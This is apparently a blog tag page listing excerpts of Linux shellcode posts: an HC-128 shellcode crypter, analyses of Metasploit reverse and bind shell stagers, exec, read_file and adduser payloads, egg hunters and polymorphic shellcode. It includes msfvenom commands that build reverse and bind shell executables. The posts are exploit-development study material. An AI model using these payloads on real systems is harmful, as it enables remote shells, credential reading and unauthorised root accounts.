In this post I will introduce custom shellcode crypter based on HC-128 cipher. Introduction to HC-128 cipher The HC-128 algorithm is a software-efficient, synchronous symmetric stream cipher designed by Hongjun Wu. The cipher makes use of a 128-bit key and 128-bit initialization vector. I will use HC-128 library developed in ECRYPT II project and simple stack execve shellcode. /bin/sh execve …
Tag: linux
Analysis of Metasploit linux/x64/shell/reverse_tcp shellcode
linux/x64/shell/reverse_tcp staged shellcode generally consists of following steps Map 4096 bytes in process’ VAS memory Create and connect socket to remote address and port Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 –platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp Set up …
Analysis of Metasploit linux/x64/exec shellcode
linux/x64/exec utilizes -c flag of system command interpreter (ie. dash on Ubuntu systems) and executes given command in non-login and non-interactive session. Important is that given command is executed as string operand instead being read from stdin. Consider following shell command $ sudo echo “foo” >> /etc/passwd bash: /etc/passwd: Permission denied The above redirection will not work because sudo is …
Analysis of Metasploit linux/x64/shell/bind_tcp shellcode
linux/x64/shell/bind_tcp staged shellcode generally consists of following steps Create listening port and wait for connection Map 4096 bytes in process’ VAS memory Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/bind_tcp -f elf -a x64 –platform linux LPORT=1234 -o staged_bind_tcp_x64 Execute the stager $ chmod …
Egg Hunters on Linux (x64)
This blog post is follow-on to my previous post on Linux x86 egg hunters. In case you haven’t got previous experience with egg hunters read at least VAS – Virtual Address Space What are and why to use egg hunters ? In this post you will find x64 versions of egg hunters introduced in Egg Hunters on Linux and analysis …
Shellcode Polymorphism Examples
In this blog post I will transform three Linux Intel x86 shellcodes via polymorphic patterns. 1. Linux/x86 Force Reboot shellcode Link to original shellcode: http://shell-storm.org/shellcode/files/shellcode-831.php Original shellcode with analysis This shellcode executes /sbin/reboot command via execve() system call stack method. Shellcode length is 36 bytes. Mutated shellcode with analysis Mutated shellcode has size of 54 bytes which is 50% more …
Analysis of Metasploit linux/x86/shell_find_port shellcode
This post analyses innards of linux/x86/shell_find_port shellcode. This shellcode spawns a shell on an established connection. Initial shellcode overview and testing Inspect payload options and generate shellcode for analysis linux/x86/shell_find_port payload has one option. We will keep CPORT set to default value 40746 Insert generated shellcode into testing C wrapper Shellcode analysis Using libemu sctest gives infinite loop strace output …
Analysis of Metasploit linux/x86/read_file shellcode
This post analyses innards of linux/x86/read_file shellcode. This shellcode reads from the local file system and writes it back out to the specified file descriptor. Initial shellcode overview and testing Inspect payload options and generate shellcode for analysis linux/x86/read_file payload has two options. We will keep FD set to 1 (STDOUT) and set path to /etc/passwd. At first glance the …
Analysis of Metasploit linux/x86/adduser shellcode
This post analyses innards of linux/x86/adduser shellcode. Running this shellcode adds custom user with UID=0 to /etc/passwd. Initial shellcode overview and testing Inspect payload options and generate shellcode for analysis linux/x86/adduser payload has three options. We will generate shellcode with custom user and password Insert generated shellcode into testing C wrapper Running shellcode as sudoer we get new user someusr …
Egg Hunters on Linux
In this blog post I will discuss egg hunters. What are egg hunters, why and how to use them. Before I dive into realm of egg hunters it will be convenient to quickly recap basics of VAS (Virtual Address Space) model for Linux platform. VAS – Virtual Address Space For every running process there is created 4GB virtual memory which …